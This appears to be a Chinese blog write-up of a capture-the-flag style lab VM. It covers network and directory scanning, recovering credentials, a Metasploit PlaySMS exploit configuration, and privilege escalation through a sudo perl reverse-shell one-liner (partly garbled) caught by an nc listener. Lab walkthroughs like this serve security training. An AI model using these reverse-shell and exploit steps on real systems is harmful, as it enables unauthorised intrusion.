2020-12-09

于 2020-12-10 15:22:37 发布
阅读量158 收藏
点赞数
分类专栏: 靶场 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wahhh123admin/article/details/110939710
版权

&&信息收集&&

ip查询
nmap 192.168.99.0/24
在这里插入图片描述
查看详细信息和查看是否有隐藏ip(没有隐藏的)
在这里插入图片描述
目录扫描
dirb http://192.168.99.34

在这里插入图片描述
robots.txt
在这里插入图片描述
/nothing
在这里插入图片描述
查看源代码
在这里插入图片描述
/tmp 、/uploads 、/angel 、/angel1(什么都没有)
/secure/
在这里插入图片描述
把源码下载到本地(发现要输入密码)
在这里插入图片描述
根据之前页面源码,密码是freedom
解压有一段音频
在这里插入图片描述
打不开
在这里插入图片描述
notepdd++打开
在这里插入图片描述
得到了用户名和路径
访问路径一下,得到一个登陆框
在这里插入图片描述
密码估计还在那个源代码哪里,最终试出密码为diana(登陆成功)
在这里插入图片描述
通过访问该页面使用playsms(基于web的短信平台)系统,暂时不知道他的版本。通过msf查看
在这里插入图片描述
配置
set targeturi SecreTSMSgatwayLogin
set rhost 192.168.99.34
set lhost 192.168.99.6
set lport 8888
set username touhid
set password diana
在这里插入图片描述

&& 提权&&

sudo -l(发现可以使用perl提权)
在这里插入图片描述
sudo perl -e ‘use Socket; i = " 192.168.99.6 " ; i="192.168.99.6"; i="192.168.99.6";p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in( p , i n e t a t o n ( p,inet_aton( p,inetaton(i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

攻击机nc -lvvp 6666监听(shell反弹)
在这里插入图片描述
找到flag
在这里插入图片描述

wahhh123admin
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
eclipse中文汉化操作 2020-12
Soulref1212的博客
12-21 1万+
本次所用 eclipse 版本为 2020-12 的 Eclipse IDE for Enterprise Java Developers 官方下载地址: https://www.eclipse.org/downloads/packages/ 官方原版(英文): ——如何汉化? 1.打开官方下载站: https://www.eclipse.org/babel/downloads.php 2.推荐选择最新版本,例 2020-09 点击 Chinese (Simplified) 前往中文翻译包所在
eclipse-jee-2020-09-R-win32-x86_64.zip
10-29
标题中的“eclipse-jee-2020-09-R-win32-x86_64.zip”指的是Eclipse IDE for Java EE Developers的2020年9月版本,适用于Windows 32位和64位系统的安装包。Eclipse是一款著名的开源集成开发环境(IDE),广泛用于...
pb利用datawindow查询符合条件的数据并且过滤掉其他数据_百分点大数据技术团队:ClickHouse国家级项目最佳实践...
weixin_39631445的博客
12-04 2602
编者按ClickHouse自从2016年开源以来,在数据分析(OLAP)领域火热,各个大厂纷纷跟进大规模使用。百分点在某国家级项目中的完成了多数据中心的ClickHouse集群建设,目前存储总量超10PB,日增数据100TB左右,预计流量今年会扩大3倍。本文是结合百分点在前期设计中的经验对ClickHouse做的整理,其中,第二章节最佳实践部分是基于我们的业务场景以及数据规模,经过大量的...
2020-04-09
zero_one666的博客
04-09 1296
每日书单 每日书单 1/ There is only one time in a person’s life when he can make a difference. That is the moment. 2/Can coral be kept away from the erosion of stormy waves? It’s nothing more than to bury thei...
2020-07-09
arb1001的博客
07-09 702
Flink windowOperator源码解析 待完成
2020-05-09
wanghuanll的博客
05-09 1255
Dⅹ3.4
2020-03-14
东哥的博客
03-14 1017
<% } %> 这个怎么改成随机
2020-04-10
m0_46591785的博客
04-10 2356
Super关键字 可以访问父类中定义的属性 可以调用父类中定义的成员方法 可以在子类构造器中调用父类构造器 .子类所有的构造器默认都访问父类中空参数的构造器 .子类一定会调用父类构造器(默认过程调用无参) //如果没有显示定义构造方法,Java编译阶段提供一个默认构造方法 //如果定义了自己的构造器,Java使用自己的构造器 //父类所有的构造器:子类必须实现它,子类默认当中一定使用到了父类的构造...
2020-07-02
thinkoutresult的博客
07-02 1044
标题java String类型复杂json串如果解析 1.根据json串解析相应的成相应的entity 2. Gson gson = new Gson(); 3. gson.fromJson(String类型复杂的json串,根据json串解析的类entity.class ) 4. 注意解析成entity的类其他的类需要注明是public,如果要张一个entity里面去弄的话 ...
2020-06-07
lyyzxl的博客
06-07 2742
arcgis engine 实现栅格计算器,包括数学运算、逻辑运算、三角函数运算和代数运算。有大佬能帮一下吗?arcgis用10.2版本,环境用vs2015,代码加注释。求大佬。
2020-12-09-124656.pdf
04-18
在电力电子领域,数字电源的调制方式是关键的技术之一,它决定了电源转换效率和稳定性。本文主要讨论了两种常见的调制方式:脉冲宽度调制(PWM)和脉冲频率调制(PFM)。 脉冲宽度调制(PWM)是一种通过改变脉冲...
eclipse-cpp-2020-09-R-win32-x86_64.zip
10-28
"eclipse-cpp-2020-09-R-win32-x86_64.zip" 是一个针对Windows x86_64架构的Eclipse IDE的特定版本,特别设计用于C和C++的开发。 该压缩包中的主要内容是"Eclipse"文件夹,它包含了完整的Eclipse CDT IDE。以下是这...
2020-02-13-raspbian-buster-lite.zip
04-30
描述中提到的文件校验信息,如SHA256哈希值(12AE6E17BF95B6BA83BECA61E7394E7411B45EBA7E6A520F434B0748EA7370E8),是用于验证下载的文件是否完整和未被篡改的关键步骤。当用户下载完文件后,可以通过计算该文件的...
CBM209X UMPToolV7200(2020-09-02).rar
02-10
《CBM209X UMPToolV7200(2020-09-02):深入理解UMP工具与CBM209X设备管理》 CBM209X UMPToolV7200是2020年9月2日发布的一款针对CBM209X系列设备的专业管理工具,它为用户提供了全面、高效的设备监控和管理功能。在...
2020-05-31
GJJailang的博客
05-31 896
现在后端不做云计算,大数据,人工智能,底层程序员是不是只剩增删改查了。感觉自己混了两年混成运维了。
去去去去去去去去去前期前期前期
08-12
去去去去去去去去去前期前期前期前期前期前期
计组P1 单周期MIPS处理器
最新发布
08-12
实验报告+项目 Verilog语言
Spring Boot原创歌曲分享平台.zip
08-12
该平台严格按照需求分析制作相关模块,并利用所学知识尽力完成,但是本人由于学识浅薄,无法真正做到让该程序可以投入市场使用,仅仅简单实现部分功能,希望日后还能改善。 本平台具有以下优点: 该平台具有较高的适用性,选用B/S结构,可以在绝大部分个人平台上使用该平台。 平台将用户权限进行划分,管理员和用户都能看到及操作的信息不一样,两者具备不同的操作权限。 该平台操作界面简单明了,大部分人都可以正常使用。 但也存在以下问题需要改进: 运行时窗口不能被刷新,可以改进。 平台过于简单,显示的信息有限。 不能添加多个管理员账号,如果可以则将利于发展原创歌曲分享规模,便于原创歌曲分享信息集中管理。 不能实时预约接待消息,容易被忽视,不利于管理员服务用户。
结果是这样的,没有根据id排:start_date end_date 0 2020-01-15 2020-04-27 1 2020-09-30 2020-10-10 2 2021-02-07 2021-02-22 3 2021-03-06 2021-03-24 4 2020-01-21 2020-03-03 .. ... ... 639 2021-03-09 2021-03-18 640 2021-03-24 2021-04-01 641 2020-01-12 2020-04-19 642 2021-02-09 2021-02-18 643 2020-01-18 2020-03-09
06-03
如果你想根据企业id对结果进行排序,可以在输出结果之前加上一行代码: ```python result = result.sort_values(by=['id']) ``` 此代码将会根据id对结果进行排序,使得每个企业的结果排在一起。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值